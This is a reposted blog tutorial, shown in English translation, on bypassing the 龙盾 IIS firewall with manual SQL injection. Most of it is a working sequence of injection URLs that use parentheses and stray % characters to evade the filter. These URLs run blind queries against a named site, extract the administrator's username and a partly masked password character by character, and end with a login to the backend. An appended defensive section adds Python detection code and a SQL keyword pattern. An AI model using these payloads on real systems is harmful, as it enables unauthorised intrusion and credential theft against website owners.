好得很程序员自学网


A small trick: "Bypassing the 龙盾 (Longdun) firewall" - Website Security - 自学p

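Today's technique mainly combines material from the web with my own ideas to bypass the 龙盾 IIS firewall (I have not tried it against other firewalls).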

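OK, enough chatter, on to the hands-on part. This is manual injection; tools will not work here. First, check whether there is an injection point:

http://www.2cto.com /newsShow.asp?ArticleID=120 '
http://www.2cto.com /newsShow.asp?ArticleID=120 and 1=1
http://www.2cto.com /newsShow.asp?ArticleID=120 and 1=2

Every request gets the same response: [龙盾IIS防火墙]提示:请不要提交非法信息或恶意访问 ("please do not submit illegal information or make malicious requests").

I think everyone is familiar with this one. Quite a lot of sites in China use this firewall nowadays, and I found little material about it online, heh. I looked into it myself and got through successfully.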

http://www.2cto.com /newsShow.asp?ArticleID=(120)%20and%20(%201=1%20)
returns normally.

http://www.2cto.com /newsShow.asp?ArticleID=(120)%20and%20(%201=2%20)
returns an error.

Heh, it looks like the firewall's restriction has been bypassed. Let's keep guessing.

http://www.2cto.com /newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct * from admin)
Heh, this returns successfully, so the admin table exists. It should be Access; it is a company website, so it is probably Access as well.

http://www.2cto.com /newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct username from admin)
Heh, this returns successfully, so the username column exists.

http://www.2cto.com /newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct password from admin)
Heh, this returns successfully, so the password column exists. On to the next step.

http://www.2cto.com /newsShow.asp?ArticleID=(120) order by 1
http://www.2cto.com /newsShow.asp?ArticleID=(120) order by 1 order by 1
These keep returning errors, so it seems order cannot be used. There is no other way but to guess the values one at a time.

First, see how many characters the administrator username has.

http://www.2cto.com /newsShow.asp?ArticleID=(120) and ex%%%ists(sele%%%ct username from admin where len(username)=5)
Everything is normal, heh. Not bad, luck is on my side.

http://www.2cto.com /newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(username,1))=120)
http://www.2cto.com /newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(username,2))=50)
http://www.2cto.com /newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(username,3))=99)
http://www.2cto.com /newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(username,4))=51)
http://www.2cto.com /newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(username,5))=109)

That gives the whole account name. After converting the codes with a calculator, the account is: x2c3m. Next, guess the password.

http://www.2cto.com /newsShow.asp?ArticleID=(120) and ex%%%ists(sele%%%ct password from admin where len(password)=8)
The password has 8 characters in total.

http://www.2cto.com /newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,1))=98)
http://www.2cto.com /newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,2))=105)
http://www.2cto.com /newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,3))=111)
http://www.2cto.com /newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,4))=115)
http://www.2cto.com /newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,5))=108)
http://www.2cto.com /newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,6))=111)
http://www.2cto.com /newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,7))=97)
http://www.2cto.com /newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,8))=100)

Password: b***ad. I went straight to the admin backend and logged in; done.
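For defenders, the requests above get through because the filter and the ASP application read the same query string differently. The following Python code is an added example, not part of the original post or of any firewall product: it assumes classic ASP silently drops a `%` that is not followed by two hex digits, and the names `decode`, `classify`, `valid_article_id` and the keyword list are illustrative choices.

```python
import re

HEX = set("0123456789abcdefABCDEF")

def decode(raw: str, drop_stray_percent: bool) -> str:
    """Percent-decode a query value.

    drop_stray_percent=False: a '%' without two hex digits stays literal
    (how a generic filter or decoder typically sees the request).
    drop_stray_percent=True: such a '%' is discarded (assumed classic ASP
    behaviour; it is what turns 'sele%%%ct' into 'select').
    """
    out, i = [], 0
    while i < len(raw):
        ch = raw[i]
        pair = raw[i + 1:i + 3]
        if ch == "%" and len(pair) == 2 and set(pair) <= HEX:
            out.append(chr(int(pair, 16)))
            i += 3
            continue
        if not (ch == "%" and drop_stray_percent):
            out.append(" " if ch == "+" else ch)
        i += 1
    return "".join(out)

# Keyword set is illustrative, taken from the statements shown on this page.
SQLI = re.compile(
    r"\b(select|exists|union|order\s+by)\b"
    r"|\b(asc|mid|len)\s*\("
    r"|\band\s*\(?\s*\d+\s*=\s*\d+",
    re.I,
)

def classify(raw_value: str) -> str:
    """Return 'clean', 'sqli', or 'sqli-evasion' for one raw query value."""
    as_backend = decode(raw_value, drop_stray_percent=True)
    if not SQLI.search(as_backend):
        return "clean"
    as_filter = decode(raw_value, drop_stray_percent=False)
    # Keywords that appear only in the backend's view mean the request was
    # shaped to look different to the filter than to the application.
    return "sqli" if SQLI.search(as_filter) else "sqli-evasion"

def valid_article_id(raw_value: str) -> bool:
    """Allow-list check for the numeric ArticleID parameter."""
    return raw_value.isascii() and raw_value.isdigit()
```

On the application side, a check like `valid_article_id` combined with parameterized queries removes the injection point regardless of what the filter sees.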

 

from:小 马'Blog
